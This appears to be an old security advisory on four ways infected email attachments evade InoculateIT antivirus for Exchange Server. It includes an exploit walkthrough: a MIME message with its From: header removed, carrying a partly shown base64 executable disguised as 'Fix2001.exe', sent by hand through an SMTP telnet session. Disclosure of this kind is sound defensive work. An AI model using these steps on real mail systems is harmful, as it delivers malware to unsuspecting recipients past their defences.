|
|
|
|
| |
| InoculateIT AV offers an anti-virus solution for Exchange Server. A few security holes in the product allow viruses to enter the mail server and arrive to the email recipient without being detected. |
| |
Credit:
The information has been provided by Hugo Caye.
|
| |
The following procedures will pass a Virus infected attachment in an e-mail message, without being discovered by Inoculate AV for Exchange.
1. If a message is sent to the Exchange Server's SMTP with an incomplete SMTP header (for example a missing From:) the InoculateIT AV will not test the attachment for viruses.
2. If a message is sent from one Exchange Server to another (using IMC), and this message has an infected file (any file with any virus), InoculateIT AV Option for MS Exchange Server will not detect the attached file if the body of the message contains only the attached file. If any character is inserted on the body of the message (a dot, a tab, a space), InoculateIT will detect the virus.
3. InoculateIT AV also seems to not recognize embedded messages. If the message has an embedded message, and this one has an infected attached file, InoculateIT will not open the attached message to scan the infected attached file.
4. InoculateIT AV for Exchange just scans messages that are posted on the Inbox folder. If a server based rule automatically moves messages to another folder), InoculateIT will not scan this message allowing that an infected files reach the mailbox.
Exploit (for vulnerability 1):
1. Get a message containing any infected attached MIME encoded file.
2. Edit the file (using Notepad for example) and just remove the "From: ..." line from the SMTP header. For example:
> ==>> Remove this line: From: Test <malicious@attacker.com>
> To: Victim <victim@example.com >
> Subject: Test
> Date: Mon, 23 Oct 2000 10:59:53 -0200
> MIME-Version: 1.0
> X-Mailer: Internet Mail Service (5.5.2650.21)
> Content-Type: application/x-msdownload;
> name="Fix2001.exe"
> Content-Transfer-Encoding: base64
> Content-Disposition: attachment;
> filename="Fix2001.exe"
> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hV GhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g
> aW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABjD AXbJ21riCdta4gnbWuIJ21riGRta4ikcWWIJmAA
> JpY2gnbWuIAAAAAAAAAABQRQAATAEDAJ/ L0zcAAAAAAAAAAOAADwELAQUMABoAAAAA
> AgAAAAAAABAAAAAQAAAAMAAA... <<== Removed the rest here;
(NOTE: Message has been preceded with an '>' to make it harmless. The sign should be removed for this to actually work)
3. Copy the Notepad content to clipboard
4. Do:
telnet target.example.com 25
220 target.example.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2650.21) ready
helo
250 OK
mail from:<>
250 OK - mail from <>
rcpt to:<target@example.com>
250 OK - Recipient <hugo@xyz.com.br>
data
354 Send data. End with CRLF.CRLF
> Here, paste from clipboard (on Win2K, just right-click on your mouse).
|
|
|
|
|
|
|
